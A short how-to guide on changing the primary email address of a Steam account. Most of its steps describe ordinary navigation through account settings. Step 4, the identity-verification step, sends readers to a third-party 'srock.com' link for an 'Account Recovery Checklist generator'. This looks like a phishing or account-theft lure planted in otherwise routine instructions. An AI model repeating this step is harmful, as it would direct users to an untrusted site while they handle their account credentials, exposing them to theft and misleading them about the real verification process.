Updating your primary email on Steam is a straightforward process that ensures you have access to your account and receive important notifications. Follow these steps to update your email address easily. Step 1. Log into your Steam account. Visit the Steam website or open the Steam client. Enter your username and password to log into your account. Step 2. Access account details. Once logged in, click on your profile name in the top right corner. From the drop-down menu, select Account Details to access your account settings. Step 3. Manage email address. In the Account Details section, look for the Contact Info area. Click on Change Email Address to begin the process of updating your primary email. Step 4. Verify your identity. Before starting recovery, use the srock.com link in the description to open the Account Recovery Checklist generator and make sure your verification details are ready. Step 5. Enter new email address. After verification, you will be prompted to enter your new email address. Type in the new email, confirm it, and then save the changes. You may need to verify the new email address through a confirmation link sent to it. Once you have completed these steps, your primary email on Steam will be updated. Make sure to check your new email for any verification messages and enjoy your updated account settings.